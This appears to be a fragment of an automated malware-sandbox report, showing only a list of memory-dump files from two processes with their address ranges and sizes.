                                                                                                            • memory/4388-4-0x00000000751E0000-0x0000000075990000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/4388-2-0x00000000057E0000-0x0000000005D84000-memory.dmp
                                                                                                              Filesize

                                                                                                              5.6MB

                                                                                                            • memory/4388-1-0x00000000008A0000-0x000000000090C000-memory.dmp
                                                                                                              Filesize

                                                                                                              432KB

                                                                                                            • memory/4388-20-0x00000000751E0000-0x0000000075990000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/4388-0-0x00000000751EE000-0x00000000751EF000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/4388-3-0x0000000005330000-0x00000000053C2000-memory.dmp
                                                                                                              Filesize

                                                                                                              584KB

                                                                                                            • memory/4388-5-0x00000000053D0000-0x0000000005436000-memory.dmp
                                                                                                              Filesize

                                                                                                              408KB

                                                                                                            • memory/4388-7-0x0000000006570000-0x00000000065AC000-memory.dmp
                                                                                                              Filesize

                                                                                                              240KB

                                                                                                            • memory/4388-6-0x0000000006030000-0x0000000006042000-memory.dmp
                                                                                                              Filesize

                                                                                                              72KB

                                                                                                            • memory/4856-40-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/4856-41-0x00007FF8EA250000-0x00007FF8EA445000-memory.dmp
                                                                                                              Filesize

                                                                                                              2.0MB

                                                                                                            • memory/4856-38-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/4856-45-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/4856-36-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/4856-42-0x00007FF8E9DA0000-0x00007FF8E9E5E000-memory.dmp
                                                                                                              Filesize

                                                                                                              760KB

                                                                                                            • memory/4856-37-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/4856-35-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB